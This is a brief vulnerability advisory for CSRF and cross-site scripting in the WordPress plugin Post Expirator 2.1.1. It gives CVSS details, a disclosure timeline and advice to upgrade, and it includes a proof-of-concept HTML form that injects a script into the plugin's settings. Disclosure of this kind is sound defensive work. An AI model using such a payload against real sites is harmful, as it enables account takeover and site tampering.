CSRF and XSS in Post Expirator 2.1.1


Last revised:

A lack of output escaping and safe request processing allows CSRF and XSS.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score 7.5 High
Vector Network
Complexity Low
Authentication None
Confidentiality Partial
Integrity Partial
Availability Partial
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

<form method="POST" action="http://localhost/wp-admin/options-general.php?page=post-expirator.php">
  <input type="text" name="expired-default-date-format" value="&quot;>&lt;script>alert(1)&lt;/script>">
  <input type="text" name="expirationdateSave" value="kthxbai">
  <input type="submit">

Advisory timeline

  • 2013-12-18 Discovered
  • 2014-02-18 Reported to
  • 2014-03-17 Updated version has appeared on the codex which reports issue fixed.

Mitigation/further actions

Upgrade immediately.